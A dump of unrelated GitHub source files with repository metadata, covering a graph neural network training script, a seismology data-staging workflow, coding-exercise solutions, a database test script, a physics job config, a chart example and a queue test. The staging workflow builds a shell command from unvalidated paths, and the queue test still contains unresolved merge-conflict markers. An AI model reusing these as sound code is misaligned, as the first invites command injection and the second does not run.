x = F.dropout(x, self.dropout, training=self.training)
x = x_0 = self.lins[0](x).relu()
for conv in self.convs:
x = F.dropout(x, self.dropout, training=self.training)
x = conv(x, x_0, adj_t)
x = x.relu()
x = F.dropout(x, self.dropout, training=self.training)
x = self.lins[1](x)
return x.log_softmax(dim=-1)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = Net(hidden_channels=64, num_layers=64, alpha=0.1, theta=0.5,
shared_weights=True, dropout=0.6).to(device)
data = data.to(device)
optimizer = torch.optim.Adam([
dict(params=model.convs.parameters(), weight_decay=0.01),
dict(params=model.lins.parameters(), weight_decay=5e-4)
], lr=0.01)
def train():
model.train()
optimizer.zero_grad()
out = model(data.x, data.adj_t)
loss = F.nll_loss(out[data.train_mask], data.y[data.train_mask])
loss.backward()
optimizer.step()
return float(loss)
@torch.no_grad()
def test():
model.eval()
pred, accs = model(data.x, data.adj_t).argmax(dim=-1), []
for _, mask in data('train_mask', 'val_mask', 'test_mask'):
accs.append(int((pred[mask] == data.y[mask]).sum()) / int(mask.sum()))
return accs
best_val_acc = test_acc = 0
for epoch in range(1, 1001):
loss = train()
train_acc, val_acc, tmp_test_acc = test()
if val_acc > best_val_acc:
best_val_acc = val_acc
test_acc = tmp_test_acc
print(f'Epoch: {epoch:04d}, Loss: {loss:.4f} Train: {train_acc:.4f}, '
f'Val: {val_acc:.4f}, Test: {tmp_test_acc:.4f}, '
f'Final Test: {test_acc:.4f}')
| [
"matthias.fey@tu-dortmund.de"
] | matthias.fey@tu-dortmund.de |
5ab8fe9166c1328be78dd07c6a721ea87a295e3b | 16c251444a3010a88d1e90bb56df46bcb0fe5ea9 | /verce-hpc-pe-new/src/test/misfit_preprocessing/stagein_graph.py | f87a4956c0ec9e41c5d576f79e4baff7e985c75d | [
"MIT"
] | permissive | rosafilgueira/VERCE | b680d708df0e77e2984c29c89a787e30a595991d | a39a6c963fd6f7f5ef5244245b92ee36f6335399 | refs/heads/master | 2020-04-08T05:39:56.857491 | 2018-07-04T14:40:48 | 2018-07-04T14:40:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,204 | py | from dispel4py.workflow_graph import WorkflowGraph
from dispel4py.provenance import *
from dispel4py.seismo.seismo import *
from dispel4py.seismo.obspy_stream import createProcessingComposite, INPUT_NAME, OUTPUT_NAME
from dispel4py.base import SimpleFunctionPE, IterativePE, create_iterative_chain
import json
#from dispel4py.visualisation import *
import os
import sys
from urlparse import urlparse
input_json=json.load(open(os.environ["INPUT_FILE"]))
class ReadJSON(GenericPE):
OUTPUT_NAME='output'
def __init__(self):
GenericPE.__init__(self)
self._add_input('input')
self._add_output('output_raw')
self._add_output('output_syn')
self._add_output('output_xml')
def _process(self, inputs):
self.write('output_raw',inputs['input']['raw_stagein_from'])
self.write('output_syn',inputs['input']['syn_stagein_from'])
self.write('output_xml',inputs['input']['stationxml_stagein_from'])
class StreamMapper(IterativePE):
def __init__(self,rootpah):
IterativePE.__init__(self)
#self._add_input('input')
#self._add_output('output')
self.counter = 0
self.roothpath=rootpah
def _process(self, inputs):
data = inputs
for i in data:
#self.log('FFFFFF: '+str(i))
url=urlparse(i)
self.write('output',[self.roothpath+url.path])
def strToBool(value):
if value=="true":
return True
if value=="false":
return False
return value
def stagein(origins,target,irods,type,rootpath,format='application/octet-stream'):
remote_locations=[]
target_locations_urls=[]
target_locations=[]
for x in origins:
stdoutdata, stderrdata = commandChain([["{}".format("globus-url-copy -cd -r gsiftp://"+irods+"/"+rootpath+'/'+x+" "+target+"/",)]],os.environ.copy())
remote_locations.append("gsiftp://"+irods+"/"+rootpath+'/'+x)
target_locations.append(target+"/"+os.path.basename(x))
target_locations_urls.append("file://"+irods+"/"+x)
prov={'location':target_locations_urls, 'format':format, 'error':stderrdata,'metadata':{'type':type,'source':remote_locations}}
return {'_d4p_prov':prov,'_d4p_data':target_locations}
stagein_raw=[(stagein,{ 'target':os.environ['STAGED_DATA']+'/'+input_json['readJSONstgin'][0]['input']['data_dir'],'irods':os.environ['IRODS_URL'],'type':'data','rootpath':'~/verce/'})
]
stagein_syn=[
(stagein,{ 'target':os.environ['STAGED_DATA']+'/'+input_json['readJSONstgin'][0]['input']['synt_dir'],'irods':os.environ['IRODS_URL'],'type':'synt','rootpath':'~/verce/'})
]
stagein_xml=[
(stagein,{ 'target':os.environ['STAGED_DATA']+'/'+input_json['readJSONstgin'][0]['input']['stations_dir'],'irods':os.environ['IRODS_URL'],'type':'stationxml','format':'application/xml','rootpath':'~/verce/'})
]
graph = WorkflowGraph()
read=ReadJSON()
read.name='readJSONstgin'
streamer0=StreamMapper('')
streamer1=StreamMapper('')
streamer2=StreamMapper('')
syn_staging_pipeline = create_iterative_chain(stagein_syn)
raw_staging_pipeline = create_iterative_chain(stagein_raw)
xml_staging_pipeline = create_iterative_chain(stagein_xml)
graph.connect(read, 'output_syn', streamer0, "input")
graph.connect(read, 'output_raw', streamer1, "input")
graph.connect(read, 'output_xml', streamer2, "input")
graph.connect(streamer0, 'output', syn_staging_pipeline, "input")
graph.connect(streamer1, 'output', raw_staging_pipeline, "input")
graph.connect(streamer2, 'output', xml_staging_pipeline, "input")
#injectProv(graph,ProvenancePE)
#attachProvenanceRecorderPE(graph,ProvenanceRecorderToFileBulk,username=os.environ['USER_NAME'],runId=os.environ['RUN_ID'],w3c_prov=False)
InitiateNewRun(graph,ProvenanceRecorderToFileBulk,username=os.environ['USER_NAME'],runId=input_json['runId'],w3c_prov=False,workflowName="preprocess_stagein",workflowId="")
#display(graph)
| [
"spinuso@knmi.nl"
] | spinuso@knmi.nl |
6d628b9f80717b0facad581feac48833a9dfd404 | f40086079bdcb465da32bfc4c244d0a699a735e3 | /informatics/series 4/Andrianampoinimerina.py | 0fb70d79e09a560f660b3642beb5efc03ad5a42b | [] | no_license | isk02206/python | e6dfc1e219ae3a51bde80fed75412bed98b3defe | b2fc6d1aa1155c0758883677eb2e37d9f92a4382 | refs/heads/master | 2022-12-06T15:14:55.264792 | 2020-09-02T01:02:11 | 2020-09-02T01:02:11 | 292,142,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,068 | py | line = int(input())
counter = 0
for i in range(line):
#print(i)
word = str(input())
if i == 0:
n = ord(word.lower()[0])
n_last = ord(word.lower()[-1])
#print(n, n_last)
if n != n_last:
print(word)
break
if i != 0:
n += 1
n_last += 1
if n == 123:
n = ord('a')
if n_last == 123:
n_last = ord('a')
#print(n, n_last)
#print(n, ord(word[0]))
if n != ord(word.lower()[0]):
print(word)
break
if n_last != ord(word.lower()[-1]):
print(word)
break
counter += 1
if counter == line:
print('no mistake')
# print(word.capitalize())
#print(n)
#print(word)
#print(word)
#convert_ord = ord(word[0])
#print(word)
#print(convert_ord)
#if s != j:
#print(word.capitalize())
#if ord(word[0]) + 1 != :
#print(word.capitalize())
#print(convert_ord)
#if word[0] != word[-1]:
#print(word.capitalize())
| [
"67949037+isk02206@users.noreply.github.com"
] | 67949037+isk02206@users.noreply.github.com |
213ff08fae05c42185868d94f5c1e285d33ba969 | 3fc49cac255c54c6512c2b60c4fe097b9d383f55 | /cube110.v3/libs/data_shelve.py | 66d490c7f28fd3e50fbfe16b6d188279d14fc25a | [] | no_license | zaswed76/all_cubes110_resorce | c029a16117866dd468b93ffb1cfdb66dd3612f1b | 79ff65fdd04b70bddd83128c8e7d1096f7235b31 | refs/heads/master | 2021-01-10T01:43:14.379636 | 2015-12-18T17:10:49 | 2015-12-18T17:11:05 | 48,290,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import shelve
import paths
# from libs.image_geometry import ImageGeometry
#
# if __name__ == '__main__':
# data_path = os.path.join(paths.root,
# r"data\cls_shl\secondary_geometry_shl")
#
#
# geometry_img = {}
# data = shelve.open(data_path)
# geometry_img["0"] = data["0"]
#
# # изменяем
# print(geometry_img["0"].x)
# geometry_img["0"].x = 45.0
#
# # сохраняем
# data["0"] = geometry_img["0"]
# print(data["0"].x)
class Shl(dict):
def __init__(self, data_path):
super().__init__()
self.data_path = data_path
self.data = None
def load(self):
self.data = shelve.open(self.data_path)
self.update(self.data)
def save(self, name):
self.data[name] = self[name]
self.data.sync()
def __setitem__(self, key, value):
print("!!")
dict.__setitem__(self, key, value)
data_path = os.path.join(paths.root,
r"data\cls_shl\secondary_geometry_shl")
s = Shl(data_path)
s.load()
print(s["0"].x )
s["0"].x = 33.3
s.save("0")
| [
"zaswed76@gmail.com"
] | zaswed76@gmail.com |
a29d0f8460dc4e59b8bbf575268a9682fa68df88 | 3a0900611a7127e74d08cb9e5e2589ac3cde9114 | /dbtest.py | 293a1aec60c8c4d3a080d899501a5a7613b0e2f5 | [
"Apache-2.0"
] | permissive | dpshorten/EC14-main | c3c83dce1be9974cc2e3a6c8f48df91e24dfbfdd | 43a62617d21f5010702c025d5538814dfb624e6c | refs/heads/master | 2021-01-15T18:26:13.698527 | 2015-01-16T20:42:48 | 2015-01-16T20:42:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,993 | py | from db import DB
db = DB("ec141:ec141@192.168.0.44/ec141", "test", 100, 50)
db.dropTables()
db.createTables()
# quit()
print(1)
id1 = db.createIndividual(1,2,3)
id2 = db.createIndividual(2,3,4)
id3 = db.createIndividual(3,4,5)
id4 = db.createIndividual(0,1,2)
id5 = db.createIndividual(0,1,1)
print(2)
print("id:"+str(id1))
indiv = db.getIndividual(id3)
print(3)
print(indiv)
traces = db.getTraces(id3)
print(4)
print(traces)
toHN = db.getHNtodos()
print(5)
print(toHN)
db.markAsHyperneated(toHN[0])
toHN = db.getHNtodos()
print(7)
print(toHN)
toVox = db.getVoxTodos()
print(8)
print(toVox)
indiv1 = db.makeFakeBaby(1)
indiv2 = db.makeFakeBaby(1,2)
print(9)
parents0 = db.getParents(1)
parents1 = db.getParents(indiv1)
parents2 = db.getParents(indiv2)
print(10)
print(parents0)
print(parents1)
print(parents2)
todos = [indiv1, indiv2]
for todo in todos:
id = todo
print("PP: looking for mates for individual {indiv}...".format(indiv=id))
mates = db.findMate(id, 5, 10)
i = 0
while (len(mates) != 0):
i+=1
mate = mates[0]
parent2 = {}
parent2["id"] = mate["mate_id"]
parent2["indiv_id"] = mate["mate_indiv_id"]
parent2["ltime"] = mate["mate_ltime"]
parent2["x"] = mate["mate_x"]
parent2["y"] = mate["mate_y"]
parent2["z"] = mate["mate_z"]
db.makeBaby(mate, parent2, mate["ltime"], 2)
newStart = mate["id"]
mates = db.findMate(id, 5, 10, newStart)
print("PP: found {len} mating occurances for individual {indiv}".format(len=i, indiv=id))
db.flush()
print(11)
db.addJob("123456", "qsub dqwpdjwpd -qdqwdq {} qdwqwd $! qwodjq")
db.addJob("123457", "qsub dqoiwdj [];.,<>\'")
db.addJob("123457", "qsub job3 blabli", ["20","21","22"])
openjobs = db.getJobsWaitingCount()
print(openjobs)
print(12)
db.setJobDone("22")
openjobs = db.getJobsWaitingCount()
print(openjobs)
print(13)
unfinished = db.getUnfinishedIndividuals()
print(unfinished)
print(14)
print("done")
| [
"fgolemo@gmail.com"
] | fgolemo@gmail.com |
ab5418c96cbee9740bff5f0d0b71eef02f8d6620 | 56f5b2ea36a2258b8ca21e2a3af9a5c7a9df3c6e | /CMGTools/H2TauTau/prod/25aug_corrMC/up/mc/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0_1377467489/HTT_24Jul_newTES_manzoni_Up_Jobs/Job_3/run_cfg.py | 90591f7bc9bd3eecf40cc3883c9708618391825f | [] | no_license | rmanzoni/HTT | 18e6b583f04c0a6ca10142d9da3dd4c850cddabc | a03b227073b2d4d8a2abe95367c014694588bf98 | refs/heads/master | 2016-09-06T05:55:52.602604 | 2014-02-20T16:35:34 | 2014-02-20T16:35:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,516 | py | import FWCore.ParameterSet.Config as cms
import os,sys
sys.path.append('/afs/cern.ch/user/m/manzoni/summer13/CMGTools/CMSSW_5_3_9/src/CMGTools/H2TauTau/prod/25aug_corrMC/up/mc/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0_1377467489/HTT_24Jul_newTES_manzoni_Up_Jobs')
from base_cfg import *
process.source = cms.Source("PoolSource",
noEventSort = cms.untracked.bool(True),
inputCommands = cms.untracked.vstring('keep *',
'drop cmgStructuredPFJets_cmgStructuredPFJetSel__PAT'),
duplicateCheckMode = cms.untracked.string('noDuplicateCheck'),
fileNames = cms.untracked.vstring('/store/cmst3/group/cmgtools/CMG/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_1_2_D3K.root',
'/store/cmst3/group/cmgtools/CMG/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_20_1_Eqr.root',
'/store/cmst3/group/cmgtools/CMG/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_21_1_u5G.root',
'/store/cmst3/group/cmgtools/CMG/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_2_1_wAR.root',
'/store/cmst3/group/cmgtools/CMG/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_3_1_uWh.root')
)
| [
"riccardo.manzoni@cern.ch"
] | riccardo.manzoni@cern.ch |
16ee7d3f51d71bb65d77726919199c6b25557acc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03291/s401672893.py | 0de631d5255eb668a211bf827e142379be3333c5 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | #!/usr/bin/env python3
import sys
MOD = 1000000007 # type: int
def solve(S: str):
dp = [[0 for j in range(4)] for i in range(len(S) + 1)]
STR = "XABC"
dp[0][0] = 1
for i in range(len(S)):
c = S[i]
for j in range(4):
next = dp[i][j]
if c == "?":
next *= 3
if j > 0:
next += dp[i][j-1]
if STR[j] == c: # 選んだ文字列が次選ぶべき文字列だったら
next += dp[i][j-1]
dp[i+1][j] = next % MOD
# print(dp)
print(dp[len(S)][3])
return
# Generated by 1.1.4 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
S = next(tokens) # type: str
solve(S)
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
79b5efdf6370d71bd53e9c32b488757c4e7680f2 | 942583ae8089c5d35c2344ad1d7ae33012349e98 | /lecture-13/removeOuterParentheses.py | f943f5b86a3b516bcf530aaf948aed189eac30df | [] | no_license | ANAMIKA1410/DSA-Live-Python-March-2021 | 1d6b836fcf3828fc1f2e800e793a7e3b71c1b4b4 | 3ffe49060b773a51fbbc0df97df8d1bc29a93afe | refs/heads/main | 2023-06-03T04:11:24.648040 | 2021-06-18T06:15:37 | 2021-06-18T06:15:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | # https://leetcode.com/problems/remove-outermost-parentheses/
class Solution:
def removeOuterParentheses(self, S: str) -> str:
count = 0
solution = []
for ch in S:
if ch == "(":
if count > 0:
solution.append("(")
count += 1
else:
if count > 1:
solution.append(")")
count -= 1
return "".join(solution)
| [
"anujgargcse@gmail.com"
] | anujgargcse@gmail.com |
5b6e25476a7535b980b893d46f952b3f3ddf17ed | bc72bffe27ad7e484283f4aeb33eed260311b301 | /6term/isob/Lab2/AS_server.py | fc060741812d9fbde4afeb5e6942458166e68a01 | [] | no_license | UladzislauB/university-monorepo | 2bb8cd88211b979908ab5b5203d26ef08d9bb983 | 5436fef4301e172d28b3548b8e270a6130ad64b6 | refs/heads/master | 2021-08-19T00:40:35.552857 | 2020-12-11T12:44:04 | 2020-12-11T12:44:04 | 233,095,879 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 532 | py | import database
import datetime
import DES
def AS_server(c_id: str):
if c_id not in database.clients:
return {}
k_c = database.clients[c_id]
tgs_id = database.tgs_id
k_c_tgc = database.keys[(c_id, tgs_id)]
tgt = {
'c': c_id,
'tgs': tgs_id,
'time': datetime.datetime.now().timestamp(),
'period': 1000,
'key': k_c_tgc
}
res = {
'tgt': DES.encrypt(str(tgt), database.K_as_tgs),
'key': k_c_tgc
}
return DES.encrypt(str(res), k_c)
| [
"devuladblr@gmail.com"
] | devuladblr@gmail.com |
85bfb89a56d119a13a6f1153053a53772e0223ee | 8afb5afd38548c631f6f9536846039ef6cb297b9 | /GIT-USERS/TOM-Lambda/CSEU3-DataStructures-GP/test_dll_queue.py | 1eb4e8e8557375db7d460e47d829a9a4eaa707f7 | [
"MIT"
] | permissive | bgoonz/UsefulResourceRepo2.0 | d87588ffd668bb498f7787b896cc7b20d83ce0ad | 2cb4b45dd14a230aa0e800042e893f8dfb23beda | refs/heads/master | 2023-03-17T01:22:05.254751 | 2022-08-11T03:18:22 | 2022-08-11T03:18:22 | 382,628,698 | 10 | 12 | MIT | 2022-10-10T14:13:54 | 2021-07-03T13:58:52 | null | UTF-8 | Python | false | false | 1,442 | py | import unittest
from dll_queue import Queue
class QueueTests(unittest.TestCase):
def setUp(self):
self.q = Queue()
def test_len_returns_0_for_empty_queue(self):
self.assertEqual(self.q.len(), 0)
def test_len_returns_correct_length_after_enqueue(self):
self.assertEqual(self.q.len(), 0)
self.q.enqueue(2)
self.assertEqual(self.q.len(), 1)
self.q.enqueue(4)
self.assertEqual(self.q.len(), 2)
self.q.enqueue(6)
self.q.enqueue(8)
self.q.enqueue(10)
self.q.enqueue(12)
self.q.enqueue(14)
self.q.enqueue(16)
self.q.enqueue(18)
self.assertEqual(self.q.len(), 9)
def test_empty_dequeue(self):
self.assertIsNone(self.q.dequeue())
self.assertEqual(self.q.len(), 0)
def test_dequeue_respects_order(self):
self.q.enqueue(100)
self.q.enqueue(101)
self.q.enqueue(105)
self.assertEqual(self.q.dequeue(), 100)
self.assertEqual(self.q.len(), 2)
self.assertEqual(self.q.dequeue(), 101)
self.assertEqual(self.q.len(), 1)
self.assertEqual(self.q.dequeue(), 105)
self.assertEqual(self.q.len(), 0)
self.assertIsNone(self.q.dequeue())
self.assertEqual(self.q.len(), 0)
<<<<<<< HEAD
if __name__ == '__main__':
=======
if __name__ == "__main__":
>>>>>>> 23fb4d348bb9c7b7b370cb2afcd785793e3816ea
unittest.main()
| [
"bryan.guner@gmail.com"
] | bryan.guner@gmail.com |
972927e1509227023dc76a553c145238805ed528 | f5745692fc8843f43da328b1f205b6b51de929bc | /users/migrations/0002_auto_20201125_0318.py | 16cbeda9b1bac567b6c6ec789107b1d692ac1561 | [] | no_license | crowdbotics-apps/asile-22963 | e9b5160cd09af70e9d1c0f377dd40b116e8693cd | 869c4560839d0e9191e87465c35759f0aaf4d4e8 | refs/heads/master | 2023-01-28T07:16:35.309960 | 2020-11-25T08:09:40 | 2020-11-25T08:09:40 | 315,815,915 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | # Generated by Django 2.2.17 on 2020-11-25 03:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("users", "0001_initial"),
]
operations = [
migrations.AlterField(
model_name="user",
name="name",
field=models.CharField(blank=True, max_length=255, null=True),
),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
9b4bc07b4f02bc5287540025a51805e38c54c784 | 641f76328bfeb7e54f0793a18c5b7c00595b98fd | /packages/qapi/qapi/serializers/fields.py | 111e482f8ec89fa948d60c5ed78aa6b33e66cbe5 | [
"Apache-2.0"
] | permissive | lianxiaopang/camel-store-api | 1d16060af92eb01607757c0423377a8c94c3a726 | b8021250bf3d8cf7adc566deebdba55225148316 | refs/heads/master | 2020-12-29T13:23:18.118617 | 2020-02-09T08:38:53 | 2020-02-09T08:38:53 | 238,621,246 | 0 | 0 | Apache-2.0 | 2020-02-07T14:28:35 | 2020-02-06T06:17:47 | Python | UTF-8 | Python | false | false | 2,999 | py | """
@author: 郭奕佳
@email: gyj@gzqichang.com
"""
from __future__ import unicode_literals
import json
from collections import OrderedDict
from urllib.parse import urlparse
from django.core.exceptions import ObjectDoesNotExist
from django.utils.encoding import uri_to_iri
from django.urls import NoReverseMatch, Resolver404, get_script_prefix, resolve
from rest_framework import serializers
class ObjectHyperlinkedRelatedField(serializers.HyperlinkedRelatedField):
serializer_class = None
def __init__(self, serializer_class, view_name=None, **kwargs):
if serializer_class is not None:
self.serializer_class = serializer_class
assert self.serializer_class is not None, 'The `serializer_class` argument is required.'
super().__init__(view_name, **kwargs)
def to_internal_value(self, data):
request = self.context.get('request', None)
try:
data = json.loads(data).get("url")
http_prefix = data.startswith(('http:', 'https:'))
except AttributeError:
self.fail('incorrect_type', data_type=type(data).__name__)
if http_prefix:
# If needed convert absolute URLs to relative path
data = urlparse(data).path
prefix = get_script_prefix()
if data.startswith(prefix):
data = '/' + data[len(prefix):]
data = uri_to_iri(data)
try:
match = resolve(data)
except Resolver404:
self.fail('no_match')
try:
expected_viewname = request.versioning_scheme.get_versioned_viewname(
self.view_name, request
)
except AttributeError:
expected_viewname = self.view_name
if match.view_name != expected_viewname:
self.fail('incorrect_match')
try:
return self.get_object(match.view_name, match.args, match.kwargs)
except (ObjectDoesNotExist, TypeError, ValueError):
self.fail('does_not_exist')
def to_representation(self, value):
assert 'request' in self.context, (
"`%s` requires the request in the serializer"
" context. Add `context={'request': request}` when instantiating "
"the serializer." % self.__class__.__name__
)
value = self.queryset.get(id=value.pk)
return self.serializer_class(value, context={'request': self.context["request"]}).data
def get_choices(self, cutoff=None):
queryset = self.get_queryset()
if queryset is None:
# Ensure that field.choices returns something sensible
# even when accessed with a read-only field.
return {}
if cutoff is not None:
queryset = queryset[:cutoff]
return OrderedDict([
(
json.dumps(self.to_representation(item)),
self.display_value(item)
)
for item in queryset
])
| [
"lyh@gzqichang.com"
] | lyh@gzqichang.com |
194e5251b4ed80b96241d230501d08fe42a9d8e1 | d15c56e6e4a73b0fb812d91385aeebab6fc5642e | /statistic_visualize.py | 065ce3ceed0a24b7788a9b0b7a9ea9cfb0df0a61 | [] | no_license | rocketpy/statistic_tutorial | 9d38c6c770613e7d515098b86356b5c2c10efa24 | 9b24e47ecb09044069923360307a4740a9652cc1 | refs/heads/master | 2022-11-23T05:47:42.987060 | 2020-07-17T19:49:40 | 2020-07-17T19:49:40 | 279,663,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 791 | py | # Altair - declarative statistical visualization library for Python
# Examples of Charts , Histograms , Maps , Interactive Charts , Case Studies : https://altair-viz.github.io/gallery/index.html
# code example , area chart with Gradient , taked from : https://altair-viz.github.io/getting_started/overview.html
import altair as alt
from vega_datasets import data
source = data.stocks()
alt.Chart(source).transform_filter(
'datum.symbol==="GOOG"'
).mark_area(
line={'color':'darkgreen'},
color=alt.Gradient(
gradient='linear',
stops=[alt.GradientStop(color='white', offset=0),
alt.GradientStop(color='darkgreen', offset=1)],
x1=1,
x2=1,
y1=1,
y2=0
)
).encode(
alt.X('date:T'),
alt.Y('price:Q')
)
| [
"noreply@github.com"
] | rocketpy.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.